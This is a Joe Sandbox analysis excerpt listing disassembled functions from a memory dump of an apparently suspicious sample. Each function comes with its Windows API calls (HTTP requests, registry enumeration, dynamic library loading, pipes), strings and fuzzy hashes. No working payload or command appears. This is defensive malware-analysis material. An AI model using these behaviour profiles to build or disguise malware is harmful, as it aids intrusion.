Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: c9dfc144265f5e6646a6a139a9d4d87370d5e888dcdba4f5ed50b184fe861233
Instruction ID: 33c303742a97b017d4f64c511241e795ea3129d0ce5568d5c3ee221398b81001
Opcode Fuzzy Hash: c9dfc144265f5e6646a6a139a9d4d87370d5e888dcdba4f5ed50b184fe861233
Instruction Fuzzy Hash: 9C51DE715093029BD7A4AF28D865ABFB7EAEF59314F040B2DF891D22D0DB70CD048B56

Function 00633137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00633277
_memmove.LIBCMT ref: 00633310
_free.LIBCMT ref: 00633336
_memmove.LIBCMT ref: 006333E9

Strings

_c, xrefs: 00633322
3cc, xrefs: 00633225

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cc$_c
API String ID: 2620147621-1111051329
Opcode ID: f930ebdd712da1bdc6f78dbaed3f26aedf5d6d32761ac108a5467df9a4f11227
Instruction ID: 950d898abc75073d1edd5b6a86c164c6e387b2f504affc86a204c84a97743545
Opcode Fuzzy Hash: f930ebdd712da1bdc6f78dbaed3f26aedf5d6d32761ac108a5467df9a4f11227
Instruction Fuzzy Hash: 10515B71A083519FDB65CF28C851B6ABBF6EF85310F48882DE989C7351DB31E945CB82

Function 00636192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00636248
_memmove.LIBCMT ref: 006362E4
_memset.LIBCMT ref: 00636308

Strings

ERCP, xrefs: 006361B3
3cc, xrefs: 006362AF

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cc$ERCP
API String ID: 2532777613-500315740
Opcode ID: 40a103be3ed751635c26c15f3828014f46d541d223a576534822d13b7ba8ca76
Instruction ID: a74c725209ed03ad5e1eab7930c08fbdfabb8c9c69343932bd3cb2379e752b4d
Opcode Fuzzy Hash: 40a103be3ed751635c26c15f3828014f46d541d223a576534822d13b7ba8ca76
Instruction Fuzzy Hash: 33518071900705EBEB24CF65C941BEBBBF6EF44314F20856EE54ACB291E770AA45CB90

Function 00682753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006827C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006827DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00682822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006E5890,00000000), ref: 0068286B

Strings

0, xrefs: 006827B5

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6981966ae49cb01b37e546307ea74b85ad297bd88c3c96a40fb4e1fd10b49234
Instruction ID: 8230fb6b744dc1201f1e21fe6833179f38fcabdea69d404c2d93624a901fc133
Opcode Fuzzy Hash: 6981966ae49cb01b37e546307ea74b85ad297bd88c3c96a40fb4e1fd10b49234
Instruction Fuzzy Hash: 3E41A2B0604302AFDB20EF24C894B5ABBE6EF85314F144A2EF56597391D730A809CB56

Function 0069D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0069D7C5

Part of subcall function 0062784B: _memmove.LIBCMT ref: 00627899

Strings

stdcall, xrefs: 0069D847
none, xrefs: 0069D8A0
winapi, xrefs: 0069D836
cdecl, xrefs: 0069D81C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 6ae09968ca09e2cf55f919e3fb4bf1631c8aea573369b8e47c046b4d140f04e7
Instruction ID: 7090993f51f207caa462c4857164f6f3373901bd30fac93a3fc3eb1f4f646b02
Opcode Fuzzy Hash: 6ae09968ca09e2cf55f919e3fb4bf1631c8aea573369b8e47c046b4d140f04e7
Instruction Fuzzy Hash: FC31B271904615ABCF10EF54CD519FEB7BAFF05320B10862EE865977D2DB31A905CB90

Function 00678E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 0067AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0067AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00678F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00678F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00678F57

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

Strings

ComboBox, xrefs: 00678E9E
ListBox, xrefs: 00678ED3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 1ee204ae016a122eac45430f8d317d86868dacc65c47d3cd8d10c90155bc6eed
Instruction ID: 17b783d72ba3da089c89e48a41d7b5c5e6c2b40654e9eba54c4de70d9cf70e7c
Opcode Fuzzy Hash: 1ee204ae016a122eac45430f8d317d86868dacc65c47d3cd8d10c90155bc6eed
Instruction Fuzzy Hash: A7210471A40108BEDB14ABB0DC49CFFB76BDF46360B14852EF429972E0DF395C099A60

Function 0069182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0069184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00691872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006918A2
InternetCloseHandle.WININET(00000000), ref: 006918E9

Part of subcall function 00692483: GetLastError.KERNEL32(?,?,00691817,00000000,00000000,00000001), ref: 00692498
Part of subcall function 00692483: SetEvent.KERNEL32(?,?,00691817,00000000,00000000,00000001), ref: 006924AD

Strings

, xrefs: 00691893

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 20bb029bf745e6c6b91c10d304d482f59cff4a3df71b1b2cf1b8d1c60208247a
Instruction ID: 53247830d29cc2eb6b8247e47f622bbcf16322800c8f008acbc2789d82321532
Opcode Fuzzy Hash: 20bb029bf745e6c6b91c10d304d482f59cff4a3df71b1b2cf1b8d1c60208247a
Instruction Fuzzy Hash: 6F21C2B5500309BFEF11AF60DD85EBF77EEEB4A744F20412BF4059A640DB209E056BA5

Function 006A63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00621D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00621D73
Part of subcall function 00621D35: GetStockObject.GDI32(00000011), ref: 00621D87
Part of subcall function 00621D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00621D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006A6461
LoadLibraryW.KERNEL32(?), ref: 006A6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006A647D
DestroyWindow.USER32(?), ref: 006A6485

Strings

SysAnimate32, xrefs: 006A643C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 7ccf663a4184a950e92c86625532e646c38af353af789639532431d9a3133a50
Instruction ID: 5e43bb721e988de7733226c9622b3b107fc9013cd1759c1aeaf79f8cff6b0888
Opcode Fuzzy Hash: 7ccf663a4184a950e92c86625532e646c38af353af789639532431d9a3133a50
Instruction Fuzzy Hash: CC218071100205ABEF106FA4DC40EBB77EAEF5A328F189629F910962A0D7719C519FA0

Function 00686D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00686DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00686DEF
GetStdHandle.KERNEL32(0000000C), ref: 00686E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00686E3B

Strings

nul, xrefs: 00686E36

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 46f6c43a7fb12f475e1b6225021d9cd1ef9bcd61017d69511991e98ccd03319b
Instruction ID: b91e58f5f2084c622b6a141aa4c5b97c25d7d35dfe4b854de50d59cc04ba014f
Opcode Fuzzy Hash: 46f6c43a7fb12f475e1b6225021d9cd1ef9bcd61017d69511991e98ccd03319b
Instruction Fuzzy Hash: E2219274600209ABDB20BF69DC04B9A77F6EF45720F204719FDA1D73D0D77099518B54

Function 00686E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00686E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00686EBB
GetStdHandle.KERNEL32(000000F6), ref: 00686ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00686F06

Strings

nul, xrefs: 00686F01

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c5deb0fd7ea96182c688c41f83aee1672e4f5183dd2225f7c6e13d212ccd2c22
Instruction ID: f74a6c15c0d07d66acc301ce95042280f6efd759627f02779025c56768f8ff22
Opcode Fuzzy Hash: c5deb0fd7ea96182c688c41f83aee1672e4f5183dd2225f7c6e13d212ccd2c22
Instruction Fuzzy Hash: 8821C4755043059BDB20AF69DC08AAA77EAEF45724F200B19FDA1D33D0DB70A941CB11

Function 0068AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0068ACA8
__swprintf.LIBCMT ref: 0068ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,006AF910), ref: 0068ACFF

Strings

%lu, xrefs: 0068ACBB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 3ff841c0aca2b3391bf926995ca33b6c8ed519c273a6d47e26a075b686a25e04
Instruction ID: 56631174d477f82ab7b3c8966273dcd18c521342521ea0e7c6d02ea78129a62c
Opcode Fuzzy Hash: 3ff841c0aca2b3391bf926995ca33b6c8ed519c273a6d47e26a075b686a25e04
Instruction Fuzzy Hash: AB21A130A00109AFCB50EFA4D945DEE7BB9EF89314B004069F9099B351DA71EE41CF21

Function 00681142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0067FCED,?,00680D40,?,00008000), ref: 0068115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0067FCED,?,00680D40,?,00008000), ref: 00681184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0067FCED,?,00680D40,?,00008000), ref: 0068118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0067FCED,?,00680D40,?,00008000), ref: 006811C1

Strings

@h, xrefs: 0068119D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @h
API String ID: 2875609808-2031928309
Opcode ID: a97b592bc62a87e82f4564ca1166d2185eeb383ef76fddd90bae29eb0f1e426f
Instruction ID: d9fcea7a5059a1c726c3ad701df681928a89ef1556cc4b8da9e6d490ad01eade
Opcode Fuzzy Hash: a97b592bc62a87e82f4564ca1166d2185eeb383ef76fddd90bae29eb0f1e426f
Instruction Fuzzy Hash: 40113031D0051DD7CF00AFE5D9486EEBB7EFF0A711F004565DA85B6240CB70A552CB95

Function 00681AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00681B19

Strings

APPEND, xrefs: 00681B52
EXISTS, xrefs: 00681B41
REMOVE, xrefs: 00681B1F
KEYS, xrefs: 00681B30

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 285bcd1e7d9ac0bacd229c2273317aeff74202f85345c9c8c7a6a11408ca9fb4
Instruction ID: 07f54443f956bcf4435af38e9391c97b1b77ae170304b20e59bd31fc01aae992
Opcode Fuzzy Hash: 285bcd1e7d9ac0bacd229c2273317aeff74202f85345c9c8c7a6a11408ca9fb4
Instruction Fuzzy Hash: 72113C709402189FCF80EF94E8558EEB7B6BF26304F1045A9D955AB392EB325D06CB54

Function 0069EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0069EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0069EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0069ED6A
CloseHandle.KERNEL32(?), ref: 0069EDEB

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 05813213a07026af20b74ff3ddf5d8fc639493b3112683fb33c692339152986b
Instruction ID: b62e32bb5af54b19abfeb4aab31fd306908fdee9dcdf2d7a8d2fd1c740956c97
Opcode Fuzzy Hash: 05813213a07026af20b74ff3ddf5d8fc639493b3112683fb33c692339152986b
Instruction Fuzzy Hash: 5881C1716007109FDB60EF28D846F6AB7E6AF88710F04891DF9999B3D2D671AC04CF95

Function 006A0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 006A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0069FDAD,?,?), ref: 006A0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006A00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006A013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006A0183
RegCloseKey.ADVAPI32(?,?), ref: 006A01AF
RegCloseKey.ADVAPI32(00000000), ref: 006A01BC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: aa627ffa9f9801b68048c64958864d21a788e252765c419273238f9a8d00589f
Instruction ID: c3a80c13c2a79f6b19de7150af2da86b1b92e6f38ee4234d8f06f998d6789080
Opcode Fuzzy Hash: aa627ffa9f9801b68048c64958864d21a788e252765c419273238f9a8d00589f
Instruction Fuzzy Hash: D6519D71208204AFD754EFA4D881EAAB7EAFF85304F40882DF585872A2DB31ED05CF56

Function 0069D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0069D927
GetProcAddress.KERNEL32(00000000,?), ref: 0069D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0069D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0069DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0069DA21

Part of subcall function 00625A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00687896,?,?,00000000), ref: 00625A2C
Part of subcall function 00625A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00687896,?,?,00000000,?,?), ref: 00625A50

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: b7ba08d9653faf1c40c5ac96747a7933f13f9a621d9736c3f6dccccfaf968e82
Instruction ID: 92b81e938d8615ea30fdb99d7b9584f540c3c59e4185369e8f9551e195ae7941
Opcode Fuzzy Hash: b7ba08d9653faf1c40c5ac96747a7933f13f9a621d9736c3f6dccccfaf968e82
Instruction Fuzzy Hash: BE512735A00619DFCB40EFA8D4849ADB7FAFF59320B048069E85AAB312D731AD45CF95

Function 0068E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0068E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0068E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0068E687

Part of subcall function 00629837: __itow.LIBCMT ref: 00629862
Part of subcall function 00629837: __swprintf.LIBCMT ref: 006298AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0068E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0068E6B4

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 04a2d937b67603fcd8f27a025263774ad206783b67ed504474c2e72ccf5ab697
Instruction ID: da7fe4f074edda384fcef5a686a59aa3de464c35ed9baca6fddc94690c8080d7
Opcode Fuzzy Hash: 04a2d937b67603fcd8f27a025263774ad206783b67ed504474c2e72ccf5ab697
